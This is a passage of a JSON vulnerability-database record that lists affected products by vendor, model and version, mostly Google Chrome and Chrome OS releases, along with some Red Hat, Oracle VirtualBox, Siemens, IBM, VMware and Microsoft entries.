        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.829.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.482.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1309.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.76"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20170"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.677.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.770.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.30"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.364.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.349.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.96"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.83"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1297.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1026"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.33"
      },
      {
        "model": "simatic ipc627d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.1"
      },
      {
        "model": "simatic ipc427c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.1"
      },
      {
        "model": "enterprise linux server year extended upd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.884.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1038"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.621.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.310"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1006"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.811.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.709.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.882.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1002.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.384.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.2"
      },
      {
        "model": "simatic hmi ktp mobile panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.76"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.563.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.24"
      },
      {
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.193.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.771.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.8"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.114"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.202"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.363.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.60"
      },
      {
        "model": "simatic ipc547e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.601.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.52"
      },
      {
        "model": "panel designer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.812.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.944.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.635.0"
      },
      {
        "model": "simatic s7-1518f-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.96"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1660.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1047.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.44"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.473.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.441.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1040"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1037.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.104"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.426.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.752.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.834.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.327.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.112"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.493.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.216"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.103"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.144"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.327"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.186"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.956.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.49"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1183.0"
      },
      {
        "model": "sinumerik tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "30.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.217"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491036"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.522.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.5"
      },
      {
        "model": "sinumerik d sl ncu720.3b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.159"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
